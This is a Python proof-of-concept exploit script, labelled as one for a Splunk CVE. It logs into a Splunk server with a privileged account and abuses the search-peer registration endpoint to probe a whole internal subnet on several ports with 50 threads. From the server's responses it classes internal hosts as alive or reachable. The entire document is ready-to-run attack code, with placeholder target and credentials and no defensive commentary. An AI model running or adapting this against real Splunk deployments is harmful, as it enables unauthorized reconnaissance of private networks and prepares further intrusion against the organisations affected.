# CVE-2025-20388 PoC - Splunk Search Peer Enumeration
# Requires high privilege user with change_authentication capability
import requests
import json
from concurrent.futures import ThreadPoolExecutor
SPLUNK_HOST = "https://target-splunk.example.com"
USERNAME = "attacker_user"
PASSWORD = "password"
def add_search_peer(target_ip, port=8089):
"""Attempt to add search peer to enumerate internal hosts"""
session = requests.Session()
login_url = f"{SPLUNK_HOST}/en-US/account/login"
# Login to Splunk
session.post(login_url, data={
'username': USERNAME,
'password': PASSWORD,
'cval': 0
})
# Try to add search peer
peer_url = f"{SPLUNK_HOST}:{port}/services/search/peers"
try:
response = session.post(peer_url, data={
'name': target_ip,
'host': target_ip,
'uri': f"https://{target_ip}:{port}"
}, timeout=5)
if response.status_code == 200:
return {"host": target_ip, "port": port, "status": "alive"}
elif "connect failed" in response.text.lower():
return {"host": target_ip, "port": port, "status": "host_reachable"}
else:
return {"host": target_ip, "port": port, "status": "unknown"}
except requests.exceptions.Timeout:
return {"host": target_ip, "port": port, "status": "alive"}
except Exception as e:
return {"host": target_ip, "port": port, "status": "error", "detail": str(e)}
def enumerate_internal_network(subnet="192.168.1", ports=[8089, 8088, 8087]):
"""Enumerate internal IPs and ports"""
targets = [f"{subnet}.{i}" for i in range(1, 255)]
results = []
with ThreadPoolExecutor(max_workers=50) as executor:
for port in ports:
futures = [executor.submit(add_search_peer, ip, port) for ip in targets]
for future in futures:
result = future.result()
if result['status'] in ['alive', 'host_reachable']:
results.append(result)
return results
if __name__ == "__main__":
print("Enumerating internal network via Splunk search peer feature...")
findings = enumerate_internal_network()
print(json.dumps(findings, indent=2))